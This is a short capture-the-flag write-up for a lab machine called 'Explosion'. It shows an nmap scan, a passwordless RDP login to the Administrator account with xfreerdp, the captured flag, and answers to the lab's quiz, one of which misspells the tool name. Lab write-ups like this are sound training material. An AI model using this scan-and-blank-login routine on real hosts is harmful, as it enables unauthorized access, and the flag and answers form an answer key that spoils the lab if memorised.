# Explosion

## Information Gathering

```
$ nmap -sV 10.129.1.13
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-07 18:11 EDT
Nmap scan report for 10.129.1.13
Host is up (0.017s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

We were able to log in to the Administrator account without a password.

```sh
$ xfreerdp /v:10.129.1.13:3389 /cert:ignore /u:Administrator
```

The flag was on the desktop.

`951fa96d7830c451b536be5a6be008a0`

## Tasks

1. What does the 3-letter acronym RDP stand for?
    * remote desktop protocol
1. What is a 3-letter acronym that refers to interaction with the host through a command line interface?
    * cli
1. What about graphical user interface interactions?
    * gui
1. What is the name of an old remote access tool that came without encryption by default?
    * `telnet`
1. What is the concept used to verify the identity of the remote host with SSH connections?
    * public-key cryptography
1. What is the name of the tool that we can use to initiate a desktop projection to our host using the terminal?
    * `xfreedrp`
1. What is the name of the service running on port 3389 TCP?
    * `ms-wbt-server`
1. What is the switch used to specify the target host's IP address when using xfreerdp?
    * `/v:<server>[:port]                Server hostname`